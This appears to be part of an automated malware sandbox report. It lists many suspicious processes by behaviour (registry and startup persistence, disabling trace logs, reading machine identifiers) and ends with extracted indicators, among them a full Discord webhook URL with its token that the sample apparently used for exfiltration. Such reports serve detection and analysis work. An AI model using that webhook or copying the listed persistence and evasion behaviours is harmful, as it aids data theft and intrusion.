      • tomcat8.exe (PID: 10712)
      • setup.exe (PID: 5612)
      • WxWorkMultiOpen.exe (PID: 11724)
      • celkadrobitel.exe (PID: 11968)
      • Final123.exe (PID: 12468)
      • ctfmon.exe (PID: 12492)
      • setup.exe (PID: 10400)
      • MSBuild.exe (PID: 11516)
      • Axam.a.exe (PID: 12436)
      • yc.exe (PID: 11752)
      • Client-built.exe (PID: 11636)
      • protect.oxcy.666.exe (PID: 9252)
      • Ganja199.exe (PID: 11904)
      • protect.oxcy.666.exe (PID: 11528)
      • Assiah.exe (PID: 11272)
      • set-2%20firmware%204.01.exe (PID: 12460)
      • Ganja174.exe (PID: 11612)
      • Build.exe (PID: 11256)
      • Ganja13.exe (PID: 12404)
      • Bugsoft.exe (PID: 11972)
      • Ganja153.exe (PID: 11668)
      • abokiii55%205.exe (PID: 11764)
      • ffdf.exe (PID: 12444)
      • ceng.exe (PID: 12428)
      • svc.exe (PID: 11304)
      • linkinggg55%205.exe (PID: 12420)
      • Ganja195.exe (PID: 11984)
      • Amus.exe (PID: 11880)
      • cabal.exe (PID: 11952)
      • dnd.exe (PID: 12224)
      • Clien123.exe (PID: 10152)
      • tcp_windows_amd64.exe (PID: 11800)
      • services.exe (PID: 11928)
      • Ganja165.exe (PID: 12452)
      • obii55%205.exe (PID: 11936)
      • Ganja99.exe (PID: 11872)
      • setup.exe (PID: 11548)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • freeman.com (PID: 12820)
      • PDFConverter_P2W154-zx-666.exe (PID: 12480)
      • eU80aK2YmFb6vbK.exe (PID: 11716)
      • rod_en_1.exe (PID: 11620)
      • reseptionProvider.exe (PID: 11784)
      • linkingg66%206.exe (PID: 11604)
      • rmd_en_1.exe (PID: 11912)
      • win7.exe (PID: 12000)
      • hersey.exe (PID: 11192)
      • Ganja172.exe (PID: 11820)
      • Adobe.exe (PID: 12412)
      • syspool.exe (PID: 11792)
      • vjVPnDfx.exe (PID: 11732)
      • ME3_setup.exe (PID: 11572)
      • Ganja168.exe (PID: 9412)
      • WxWorkMultiOpen.exe (PID: 11644)
      • Ganja36.exe (PID: 11660)
      • porn.exe (PID: 11596)
      • cc.exe (PID: 12016)
      • lv.exe (PID: 12728)
      • Ganja113.exe (PID: 11628)
      • RegAsm.exe (PID: 11328)
      • ctfmon.exe (PID: 14232)
      • 90.exe (PID: 10852)
      • SLoader.exe (PID: 3872)
      • REXCEL~1.EXE (PID: 14640)
      • setup.exe (PID: 14580)
      • Setup.exe (PID: 14596)
      • Setup.exe (PID: 14764)
      • RMO_SE~2.EXE (PID: 14888)
      • Setup.exe (PID: 14684)
      • Terminal.exe (PID: 13608)
      • dp.exe (PID: 11876)
      • msconfig.exe (PID: 15032)
      • is-4HI07.tmp (PID: 10924)
      • bin.exe (PID: 8936)
      • is-NC47T.tmp (PID: 14616)
      • neploskiy_crypted_LAB.exe (PID: 12008)
      • pe2shc.exe (PID: 11708)
      • cryptedcron121221.exe (PID: 11920)
      • WxWorkMultiOpen.exe (PID: 10912)
      • alex123123.exe (PID: 11992)
      • protect.oxcy.666.exe (PID: 15304)
      • jzQILRF.exe (PID: 14144)
      • llll.exe (PID: 11676)
      • Axam.exe (PID: 7464)
      • rickroll.exe (PID: 11944)
      • cron123213321.exe (PID: 11772)
      • protect.oxcy.666.exe (PID: 14512)
      • Axam.exe (PID: 8044)
      • moi.exe (PID: 11896)
      • Axam.exe (PID: 7820)
      • Axam.exe (PID: 7768)
      • Axam.exe (PID: 7428)
      • msiexec.exe (PID: 4236)
      • Axam.exe (PID: 10932)
      • c2_payload_aes.exe (PID: 9620)
      • Axam.exe (PID: 10324)
      • nxTpPrk.exe (PID: 12744)
      • Axam.exe (PID: 7860)
      • dnd.exe (PID: 6796)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 8032)
      • Axam.exe (PID: 13896)
      • abokiii55%205.exe (PID: 8672)
      • csc.exe (PID: 12260)
      • Axam.exe (PID: 10688)
      • Axam.exe (PID: 8960)
      • MSBuild.exe (PID: 9508)
      • obii55%205.exe (PID: 15020)
      • Axam.exe (PID: 14292)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 15096)
      • Axam.exe (PID: 15580)
      • Axam.exe (PID: 15500)
      • Axam.exe (PID: 15748)
      • cvtres.exe (PID: 15636)
      • Axam.exe (PID: 16136)
      • MSBuild.exe (PID: 12932)
      • msiexec.exe (PID: 15100)
      • csc.exe (PID: 10668)
      • MSBuild.exe (PID: 15376)
      • csc.exe (PID: 15008)
      • Axam.exe (PID: 7608)
      • cvtres.exe (PID: 15560)
      • cmd.exe (PID: 15244)
      • cvtres.exe (PID: 13272)
      • csc.exe (PID: 10504)
      • csc.exe (PID: 10328)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15816)
      • dnd_x86.exe (PID: 15496)
      • cvtres.exe (PID: 15728)
      • Axam.exe (PID: 7300)
      • MSBuild.exe (PID: 15660)
      • cvtres.exe (PID: 7484)
    • Reads the computer name

      • main.exe (PID: 6212)
      • main.exe (PID: 5084)
      • bitdefender.exe (PID: 6812)
      • WxWorkMultiOpen.exe (PID: 7208)
      • 4eDsFzc.exe (PID: 7472)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • Client.exe (PID: 7996)
      • WxWorkMultiOpen.exe (PID: 7892)
      • WxWorkMultiOpen.exe (PID: 7936)
      • WxWorkMultiOpen.exe (PID: 7844)
      • startud.exe (PID: 8196)
      • safefinder.exe (PID: 8304)
      • plctkles.exe (PID: 8240)
      • ap.exe (PID: 8460)
      • comdgpx.exe (PID: 8296)
      • Cp1N8fC.exe (PID: 8976)
      • Ganja177.exe (PID: 8928)
      • LOIC.exe (PID: 8680)
      • klass.exe (PID: 8496)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • b7VRzCg.exe (PID: 8784)
      • MARCUSS.exe (PID: 8752)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • Ganja46.exe (PID: 9540)
      • lol.exe (PID: 9004)
      • demon.exe (PID: 9692)
      • march.exe (PID: 9716)
      • Ganja66.exe (PID: 9776)
      • kajmak.exe (PID: 9756)
      • WxWorkMultiOpen.exe (PID: 8792)
      • CryptoLocker.exe (PID: 9684)
      • https.exe (PID: 9744)
      • Ganja20.exe (PID: 9788)
      • ls.exe (PID: 9896)
      • Ganja151.exe (PID: 9428)
      • Whisker.exe (PID: 8968)
      • DumpAADUserPRT.exe (PID: 8800)
      • ganja5.exe (PID: 9444)
      • Ganja61.exe (PID: 8920)
      • winsvchost.exe (PID: 10188)
      • ls.exe (PID: 8884)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • Prolin.exe (PID: 9492)
      • lsssk.exe (PID: 9296)
      • AdobeART.exe (PID: 4804)
      • Ganja85.exe (PID: 8600)
      • baboon.exe (PID: 9728)
      • WhQMcgn.exe (PID: 9104)
      • tzcyberninja.exe (PID: 9528)
      • installer.exe (PID: 8688)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 7524)
      • Ganja35.exe (PID: 10840)
      • demonx64.exe (PID: 9704)
      • 1.exe (PID: 8836)
      • Doppelganger.exe (PID: 9012)
      • test1.exe (PID: 10368)
      • Ganja3.exe (PID: 10708)
      • drivers.exe (PID: 10644)
      • Ganja39.exe (PID: 10740)
      • Ganja107.exe (PID: 10732)
      • Ganja90.exe (PID: 10772)
      • Ganja45.exe (PID: 10664)
      • Ganja49.exe (PID: 10700)
      • 90.exe (PID: 11012)
      • Ganja176.exe (PID: 10532)
      • Ganja154.exe (PID: 10960)
      • Ganja190.exe (PID: 11024)
      • 123.exe (PID: 10684)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • EG11t89.exe (PID: 10540)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • svchost.exe (PID: 11248)
      • WxWorkMultiOpen.exe (PID: 11724)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • index.exe (PID: 11216)
      • Ganja199.exe (PID: 11904)
      • Ganja153.exe (PID: 11668)
      • dnd.exe (PID: 12224)
      • Ganja195.exe (PID: 11984)
      • Ganja99.exe (PID: 11872)
      • Assiah.exe (PID: 11272)
      • Ganja165.exe (PID: 12452)
      • Clien123.exe (PID: 10152)
      • PDFConverter_P2W154-zx-666.exe (PID: 12480)
      • Ganja128.exe (PID: 10652)
      • Anap.a.exe (PID: 11140)
      • cabal.exe (PID: 11952)
      • obii55%205.exe (PID: 11936)
      • setup.exe (PID: 5612)
      • Client-built.exe (PID: 11636)
      • Ganja172.exe (PID: 11820)
      • Ganja13.exe (PID: 12404)
      • Ganja174.exe (PID: 11612)
      • Ganja36.exe (PID: 11660)
      • Adobe.exe (PID: 12412)
      • tcp_windows_amd64.exe (PID: 11800)
      • WxWorkMultiOpen.exe (PID: 11644)
      • setup.exe (PID: 10400)
      • ceng.exe (PID: 12428)
      • services.exe (PID: 11928)
      • win7.exe (PID: 12000)
      • reseptionProvider.exe (PID: 11784)
      • setup.exe (PID: 11548)
      • freeman.com (PID: 12820)
      • hersey.exe (PID: 11192)
      • cc.exe (PID: 12016)
      • syspool.exe (PID: 11792)
      • porn.exe (PID: 11596)
      • Final123.exe (PID: 12468)
      • Build.exe (PID: 11256)
      • Ganja113.exe (PID: 11628)
      • Amus.exe (PID: 11880)
      • abokiii55%205.exe (PID: 11764)
      • ME3_setup.exe (PID: 11572)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • Axam.a.exe (PID: 12436)
      • yc.exe (PID: 11752)
      • RegAsm.exe (PID: 11328)
      • Ganja168.exe (PID: 9412)
      • SLoader.exe (PID: 3872)
      • REXCEL~1.EXE (PID: 14640)
      • bot.exe (PID: 11004)
      • joker12321.exe (PID: 11232)
      • msconfig.exe (PID: 15032)
      • 80aK2YmFb6vbKeU.exe (PID: 8744)
      • linkinggg55%205.exe (PID: 12420)
      • Setup.exe (PID: 14684)
      • Setup.exe (PID: 14596)
      • Terminal.exe (PID: 13608)
      • jtEmt5nxbRnq5jC.exe (PID: 8824)
      • payload.exe (PID: 8908)
      • bin.exe (PID: 8936)
      • lollo.exe (PID: 7184)
      • is-4HI07.tmp (PID: 10924)
      • Worldoffice.exe (PID: 6412)
      • Worldofficee.exe (PID: 6532)
      • ctfmon.exe (PID: 12492)
      • set-2%20firmware%204.01.exe (PID: 12460)
      • Setup.exe (PID: 14764)
      • RMO_SE~2.EXE (PID: 14888)
      • setup.exe (PID: 14580)
      • ctfmon.exe (PID: 14232)
      • is-NC47T.tmp (PID: 14616)
      • linkingg66%206.exe (PID: 11604)
      • eU80aK2YmFb6vbK.exe (PID: 11716)
      • pe2shc.exe (PID: 11708)
      • WxWorkMultiOpen.exe (PID: 10912)
      • Axam.exe (PID: 8044)
      • Axam.exe (PID: 7464)
      • Axam.exe (PID: 10932)
      • Axam.exe (PID: 7768)
      • Axam.exe (PID: 7820)
      • Axam.exe (PID: 7428)
      • msiexec.exe (PID: 4236)
      • Axam.exe (PID: 10324)
      • svc.exe (PID: 11304)
      • dp.exe (PID: 11876)
      • jzQILRF.exe (PID: 14144)
      • ffdf.exe (PID: 12444)
      • c2_payload_aes.exe (PID: 9620)
      • Axam.exe (PID: 7860)
      • dnd.exe (PID: 6796)
      • MSBuild.exe (PID: 9508)
      • protect.oxcy.666.exe (PID: 14512)
      • abokiii55%205.exe (PID: 8672)
      • Axam.exe (PID: 10688)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 14292)
      • obii55%205.exe (PID: 15020)
      • Axam.exe (PID: 8960)
      • Axam.exe (PID: 8032)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 15580)
      • Axam.exe (PID: 13896)
      • Axam.exe (PID: 15748)
      • MSBuild.exe (PID: 12932)
      • msiexec.exe (PID: 15100)
      • Axam.exe (PID: 15096)
      • MSBuild.exe (PID: 15376)
      • Axam.exe (PID: 15500)
      • cmd.exe (PID: 15244)
      • Axam.exe (PID: 16136)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15816)
      • Axam.exe (PID: 7608)
      • dnd_x86.exe (PID: 15496)
      • Axam.exe (PID: 7300)
      • MSBuild.exe (PID: 15660)
    • Create files in a temporary directory

      • main.exe (PID: 6212)
      • 4eDsFzc.exe (PID: 7472)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • jtEmt5nxbRnq5jC.exe (PID: 8824)
      • 80aK2YmFb6vbKeU.exe (PID: 8744)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • Prolin.exe (PID: 9492)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • rxd_en_1.exe (PID: 11224)
      • setup.exe (PID: 10400)
      • setup.exe (PID: 5612)
      • set-2%20firmware%204.01.exe (PID: 12460)
      • protect.oxcy.666.exe (PID: 9252)
      • dnd.exe (PID: 12224)
      • setup.exe (PID: 11548)
      • Bugsoft.exe (PID: 11972)
      • protect.oxcy.666.exe (PID: 11528)
      • Amus.exe (PID: 11880)
      • rod_en_1.exe (PID: 11620)
      • Axam.a.exe (PID: 12436)
      • linkinggg55%205.exe (PID: 12420)
      • eU80aK2YmFb6vbK.exe (PID: 11716)
      • rmd_en_1.exe (PID: 11912)
      • drivers.exe (PID: 10644)
      • freeman.com (PID: 12820)
      • linkingg66%206.exe (PID: 11604)
      • cabal.exe (PID: 11952)
      • hersey.exe (PID: 11192)
      • setup.exe (PID: 14580)
      • RMO_SE~2.EXE (PID: 14888)
      • SLoader.exe (PID: 3872)
      • msconfig.exe (PID: 15032)
      • is-NC47T.tmp (PID: 14616)
      • is-4HI07.tmp (PID: 10924)
      • ap.exe (PID: 8460)
      • Axam.exe (PID: 7428)
      • Axam.exe (PID: 7768)
      • Axam.exe (PID: 8044)
      • Axam.exe (PID: 7464)
      • Axam.exe (PID: 7820)
      • Axam.exe (PID: 10324)
      • Axam.exe (PID: 10932)
      • MSBuild.exe (PID: 11516)
      • Axam.exe (PID: 7860)
      • protect.oxcy.666.exe (PID: 15304)
      • Axam.exe (PID: 14468)
      • protect.oxcy.666.exe (PID: 14512)
      • Axam.exe (PID: 13896)
      • Axam.exe (PID: 8032)
      • EG11t89.exe (PID: 10540)
      • ctfmon.exe (PID: 14232)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 8960)
      • Axam.exe (PID: 10688)
      • csc.exe (PID: 12260)
      • Axam.exe (PID: 14292)
      • Axam.exe (PID: 15500)
      • Axam.exe (PID: 15096)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • Axam.exe (PID: 15580)
      • cvtres.exe (PID: 15636)
      • Axam.exe (PID: 15748)
      • Axam.exe (PID: 16136)
      • msiexec.exe (PID: 7940)
      • powershell.exe (PID: 11016)
      • powershell.exe (PID: 2168)
      • rundll32.exe (PID: 9736)
      • svc.exe (PID: 11304)
      • csc.exe (PID: 10668)
      • msiexec.exe (PID: 14196)
      • cvtres.exe (PID: 15560)
      • csc.exe (PID: 15008)
      • Axam.exe (PID: 7608)
      • cvtres.exe (PID: 13272)
      • powershell.exe (PID: 16332)
      • csc.exe (PID: 10504)
      • csc.exe (PID: 10328)
      • cvtres.exe (PID: 15728)
      • powershell.exe (PID: 756)
      • dnd_x86.exe (PID: 15496)
      • powershell.exe (PID: 15268)
      • Axam.exe (PID: 7300)
      • cvtres.exe (PID: 7484)
      • powershell.exe (PID: 15712)
    • Checks proxy server information

      • main.exe (PID: 5084)
      • explorer.exe (PID: 4772)
      • safefinder.exe (PID: 8304)
      • march.exe (PID: 9716)
      • plctkles.exe (PID: 8240)
      • bitdefender.exe (PID: 6812)
      • demon.exe (PID: 9692)
      • https.exe (PID: 9744)
      • baboon.exe (PID: 9728)
      • svchost.exe (PID: 11248)
      • MSBuild.exe (PID: 11516)
      • svchost.exe (PID: 13808)
      • cabal.exe (PID: 11952)
      • ganja5.exe (PID: 9444)
      • Ganja151.exe (PID: 9428)
      • Ganja61.exe (PID: 8920)
      • c2_payload_aes.exe (PID: 9620)
      • Ganja128.exe (PID: 10652)
      • bot.exe (PID: 11004)
      • Assiah.exe (PID: 11272)
      • Client-built.exe (PID: 11636)
      • jzQILRF.exe (PID: 14144)
      • dnd.exe (PID: 6796)
      • obii55%205.exe (PID: 15020)
      • MSBuild.exe (PID: 12932)
      • powershell.exe (PID: 8696)
      • svc.exe (PID: 11304)
      • freeman.com (PID: 12820)
      • powershell.exe (PID: 8896)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 11124)
    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 3108)
      • explorer.exe (PID: 4772)
      • svchost.exe (PID: 13808)
      • powershell.exe (PID: 11016)
      • powershell.exe (PID: 2168)
      • powershell.exe (PID: 16332)
      • WMIC.exe (PID: 15860)
      • powershell.exe (PID: 756)
      • powershell.exe (PID: 15268)
    • Launching a file from a Registry key

      • loader.exe (PID: 7912)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • runtimebroker.exe (PID: 8736)
      • klass.exe (PID: 8496)
      • ls.exe (PID: 9896)
      • winsvchost.exe (PID: 10188)
      • AdobeART.exe (PID: 4804)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • tzcyberninja.exe (PID: 9528)
      • explorer.exe (PID: 10604)
      • Adobe.exe (PID: 12412)
      • Cp1N8fC.exe (PID: 8976)
      • syspool.exe (PID: 11792)
      • ctfmon.exe (PID: 12492)
      • rmd_en_1.exe (PID: 11912)
      • rxd_en_1.exe (PID: 11224)
      • rod_en_1.exe (PID: 11620)
      • Axam.a.exe (PID: 12436)
      • Amus.exe (PID: 11880)
      • 90.exe (PID: 10852)
      • msconfig.exe (PID: 15032)
      • WhQMcgn.exe (PID: 9104)
      • ffdf.exe (PID: 12444)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 8032)
      • Axam.exe (PID: 13896)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 8960)
      • Axam.exe (PID: 15580)
      • Axam.exe (PID: 14292)
      • Axam.exe (PID: 15500)
      • Axam.exe (PID: 10688)
      • Axam.exe (PID: 15096)
      • Axam.exe (PID: 16136)
      • Axam.exe (PID: 15748)
      • Axam.exe (PID: 7608)
      • dnd_x86.exe (PID: 15496)
    • The sample compiled with spanish language support

      • main.exe (PID: 5084)
      • ctfmon.exe (PID: 12492)
    • The sample compiled with turkish language support

      • main.exe (PID: 5084)
    • Reads the machine GUID from the registry

      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • Client.exe (PID: 7996)
      • LOIC.exe (PID: 8680)
      • MARCUSS.exe (PID: 8752)
      • ap.exe (PID: 8460)
      • plctkles.exe (PID: 8240)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • startud.exe (PID: 8196)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • CryptoWall.exe (PID: 10328)
      • ganja5.exe (PID: 9444)
      • 1.exe (PID: 8836)
      • b7VRzCg.exe (PID: 8784)
      • drivers.exe (PID: 10644)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • EG11t89.exe (PID: 10540)
      • Ganja61.exe (PID: 8920)
      • trip.exe (PID: 11208)
      • Assiah.exe (PID: 11272)
      • cabal.exe (PID: 11952)
      • reseptionProvider.exe (PID: 11784)
      • obii55%205.exe (PID: 11936)
      • freeman.com (PID: 12820)
      • Final123.exe (PID: 12468)
      • Client-built.exe (PID: 11636)
      • cc.exe (PID: 12016)
      • 90.exe (PID: 11012)
      • MSBuild.exe (PID: 11516)
      • Build.exe (PID: 11256)
      • RegAsm.exe (PID: 11328)
      • Ganja128.exe (PID: 10652)
      • Clien123.exe (PID: 10152)
      • bot.exe (PID: 11004)
      • c2_payload_aes.exe (PID: 9620)
      • jzQILRF.exe (PID: 14144)
      • dp.exe (PID: 11876)
      • dnd.exe (PID: 6796)
      • services.exe (PID: 11928)
      • csc.exe (PID: 12260)
      • abokiii55%205.exe (PID: 8672)
      • obii55%205.exe (PID: 15020)
      • csc.exe (PID: 10668)
      • csc.exe (PID: 15008)
      • cmd.exe (PID: 15244)
      • csc.exe (PID: 10504)
      • csc.exe (PID: 10328)
      • MSBuild.exe (PID: 15624)
      • dnd_x86.exe (PID: 15496)
      • ceng.exe (PID: 12428)
    • Creates files or folders in the user directory

      • Client.exe (PID: 7996)
      • Taskmgr.exe (PID: 3108)
      • loader.exe (PID: 7912)
      • Ganja54.exe (PID: 8704)
      • lol.exe (PID: 9004)
      • CryptoLocker.exe (PID: 9684)
      • explorer.exe (PID: 4772)
      • b7VRzCg.exe (PID: 8784)
      • test1.exe (PID: 10368)
      • tzcyberninja.exe (PID: 9528)
      • explorer.exe (PID: 10604)
      • Cp1N8fC.exe (PID: 8976)
      • syspool.exe (PID: 11792)
      • ctfmon.exe (PID: 12492)
      • joker12321.exe (PID: 11232)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • 123.exe (PID: 10684)
      • Amus.exe (PID: 11880)
      • Axam.a.exe (PID: 12436)
      • MSBuild.exe (PID: 11516)
      • f.exe (PID: 8712)
      • werefult.exe (PID: 8760)
      • ap.exe (PID: 8460)
      • EG11t89.exe (PID: 10540)
      • ffdf.exe (PID: 12444)
      • Client-built.exe (PID: 11636)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • freeman.com (PID: 12820)
      • svc.exe (PID: 11304)
      • ceng.exe (PID: 12428)
      • dnd_x86.exe (PID: 15496)
    • Process checks computer location settings

      • 4eDsFzc.exe (PID: 7472)
      • lol.exe (PID: 9004)
      • test1.exe (PID: 10368)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • setup.exe (PID: 11548)
      • joker12321.exe (PID: 11232)
      • index.exe (PID: 11216)
      • ap.exe (PID: 8460)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • hersey.exe (PID: 11192)
      • yc.exe (PID: 11752)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • Cp1N8fC.exe (PID: 8976)
      • 123.exe (PID: 10684)
      • WhQMcgn.exe (PID: 9104)
      • EG11t89.exe (PID: 10540)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • cabal.exe (PID: 11952)
      • ffdf.exe (PID: 12444)
      • ganja5.exe (PID: 9444)
      • freeman.com (PID: 12820)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 8232)
      • mshta.exe (PID: 8280)
      • mshta.exe (PID: 8220)
      • mshta.exe (PID: 8264)
      • mshta.exe (PID: 16212)
    • Reads Environment values

      • Client.exe (PID: 7996)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • runtimebroker.exe (PID: 8736)
      • ganja5.exe (PID: 9444)
      • Ganja151.exe (PID: 9428)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • startud.exe (PID: 8196)
      • MSBuild.exe (PID: 11516)
      • Ganja128.exe (PID: 10652)
      • Assiah.exe (PID: 11272)
      • bot.exe (PID: 11004)
      • 1.exe (PID: 8836)
      • drivers.exe (PID: 10644)
    • Creates files in the program directory

      • Ganja177.exe (PID: 8928)
      • Ganja46.exe (PID: 9540)
      • kajmak.exe (PID: 9756)
      • Ganja20.exe (PID: 9788)
      • MSBuild.exe (PID: 11516)
      • svc.exe (PID: 11304)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • bot.exe (PID: 11004)
      • ganja5.exe (PID: 9444)
      • abokiii55%205.exe (PID: 8672)
      • dnd_x86.exe (PID: 15496)
    • Reads mouse settings

      • 80aK2YmFb6vbKeU.exe (PID: 8744)
      • jtEmt5nxbRnq5jC.exe (PID: 8824)
      • linkinggg55%205.exe (PID: 12420)
      • eU80aK2YmFb6vbK.exe (PID: 11716)
      • linkingg66%206.exe (PID: 11604)
    • Disables trace logs

      • plctkles.exe (PID: 8240)
      • ganja5.exe (PID: 9444)
      • Ganja151.exe (PID: 9428)
      • Ganja61.exe (PID: 8920)
      • cabal.exe (PID: 11952)
      • Ganja128.exe (PID: 10652)
      • bot.exe (PID: 11004)
      • Assiah.exe (PID: 11272)
      • Client-built.exe (PID: 11636)
      • MARCUSS.exe (PID: 8752)
      • obii55%205.exe (PID: 15020)
      • powershell.exe (PID: 8696)
      • freeman.com (PID: 12820)
      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 11124)
      • powershell.exe (PID: 8896)
    • The sample compiled with korean language support

      • main.exe (PID: 5084)
    • PyInstaller has been detected (YARA)

      • main.exe (PID: 6212)
    • Launching a file from the Startup directory

      • b7VRzCg.exe (PID: 8784)
      • tzcyberninja.exe (PID: 9528)
      • Axam.a.exe (PID: 12436)
      • bot.exe (PID: 11004)
      • ffdf.exe (PID: 12444)
      • setup.exe (PID: 5612)
    • The sample compiled with chinese language support

      • main.exe (PID: 5084)
      • yc.exe (PID: 11752)
    • Reads the software policy settings

      • explorer.exe (PID: 4772)
      • WhQMcgn.exe (PID: 9104)
      • MSBuild.exe (PID: 11516)
      • Build.exe (PID: 11256)
      • jzQILRF.exe (PID: 14144)
      • powershell.exe (PID: 11016)
      • obii55%205.exe (PID: 15020)
      • powershell.exe (PID: 2168)
      • MSBuild.exe (PID: 9508)
      • powershell.exe (PID: 16332)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15376)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • powershell.exe (PID: 756)
      • MSBuild.exe (PID: 15816)
      • powershell.exe (PID: 15268)
    • The sample compiled with french language support

      • set-2%20firmware%204.01.exe (PID: 12460)
    • Reads CPU info

      • MSBuild.exe (PID: 11516)
      • ganja5.exe (PID: 9444)
      • Ganja128.exe (PID: 10652)
    • Reads product name

      • MSBuild.exe (PID: 11516)
    • Executable content was dropped or overwritten

      • iexplore.exe (PID: 15296)
      • msiexec.exe (PID: 14196)
    • Application launched itself

      • chrome.exe (PID: 13040)
      • chrome.exe (PID: 10104)
      • chrome.exe (PID: 16324)
      • chrome.exe (PID: 8872)
      • chrome.exe (PID: 14052)
      • chrome.exe (PID: 9584)
      • chrome.exe (PID: 17296)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8776)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 11184)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 11588)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 9040)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2200)
      • obii55%205.exe (PID: 15020)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 10176)
      • powershell.exe (PID: 11124)
    • CONNECTWISE has been detected

      • msiexec.exe (PID: 14196)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 7632)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 10724)
    • Process checks whether UAC notifications are on

      • dnd_x86.exe (PID: 15496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(5084) main.exe
Discord-Webhook-Tokens (1)1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Discord-Info-Links
1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Get Webhook Infohttps://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:19 18:59:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 178688
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xc380
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
568
Monitored processes
433
Malicious processes
79
Suspicious processes
50

Behavior graph

Click at the process to see the details
